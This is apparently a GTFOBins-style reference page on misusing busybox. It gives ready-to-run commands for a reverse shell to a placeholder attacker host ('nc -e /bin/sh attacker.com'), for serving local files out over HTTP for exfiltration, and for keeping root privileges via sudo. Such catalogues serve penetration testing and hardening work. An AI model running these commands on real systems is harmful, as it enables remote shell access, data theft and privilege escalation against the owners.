.. / busybox

Fork Star

• Reverse shell
• Upload
• Inherit
• Shell
• File write
• File read

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Unprivileged

  This function can be performed by any unprivileged user.

  busybox nc -e /bin/sh attacker.com 12345

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  busybox nc -e /bin/sh attacker.com 12345

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Listener

  A TCP server can be used on the attacker box to receive the shell.

  nc -l -p 12345

Upload

This executable can upload local data.

• Comment

  This serves files in the local folder via an HTTP server.

  Unprivileged

  This function can be performed by any unprivileged user.

  busybox httpd -f -p 12345 -h .

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  busybox httpd -f -p 12345 -h .

  Receiver

  An HTTP client can be used on the attacker box to receive the data.

  curl victim.com -o /path/to/output-file

Inherit

This executable can inherit functions from another.

• Unprivileged

  This function can be performed by any unprivileged user.

  busybox ash

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  busybox ash

  Functions

  Inherits from ash, thus possibly granting the following functions:

  • Shell
  • File write

• Unprivileged

  This function can be performed by any unprivileged user.

  busybox cat

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  busybox cat

  Functions

  Inherits from cat, thus possibly granting the following functions:

  • File read

Source | History